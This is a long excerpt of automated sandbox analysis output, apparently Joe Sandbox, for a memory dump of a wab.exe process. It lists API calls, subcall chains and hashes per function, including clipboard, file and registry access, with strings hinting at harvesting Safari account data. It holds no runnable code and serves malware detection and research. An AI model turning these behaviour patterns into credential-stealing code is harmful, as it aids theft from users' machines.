                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 1863332320-0
                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                  • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 3655998216-0
                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00445426
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1828521557-0
                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                  • memcpy.MSVCRT ref: 00406942
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 609303285-0
                                                                                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmp
                                                                                  • String ID:
                                                                                  • API String ID: 2081463915-0
                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                  • String ID:
                                                                                  • API String ID: 2136311172-0
                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@
                                                                                  • String ID:
                                                                                  • API String ID: 1936579350-0
                                                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                  • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                  • String ID:
                                                                                  • API String ID: 2565263379-0
                                                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                  • API String ID: 2780580303-317687271
                                                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                  • String ID:
                                                                                  • API String ID: 4218492932-0
                                                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                  • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                  • memcpy.MSVCRT ref: 004098B5
                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2014503067-0
                                                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                  • String ID: OsError 0x%x (%u)
                                                                                  • API String ID: 403622227-2664311388
                                                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                  • OpenClipboard.USER32(?), ref: 00411878
                                                                                  • GetLastError.KERNEL32 ref: 0041188D
                                                                                  • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                    • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                    • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                    • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                    • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                    • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                    • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                    • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                    • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                    • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                                                  • String ID:
                                                                                  • API String ID: 1203541146-0
                                                                                  • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                  • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                  • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                  • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 1865533344-0
                                                                                  • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                  • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                  • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                  • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                  • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: NtdllProc_Window
                                                                                  • String ID:
                                                                                  • API String ID: 4255912815-0
                                                                                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                  • memcpy.MSVCRT ref: 0040269B
                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • memcpy.MSVCRT ref: 004026FF
                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
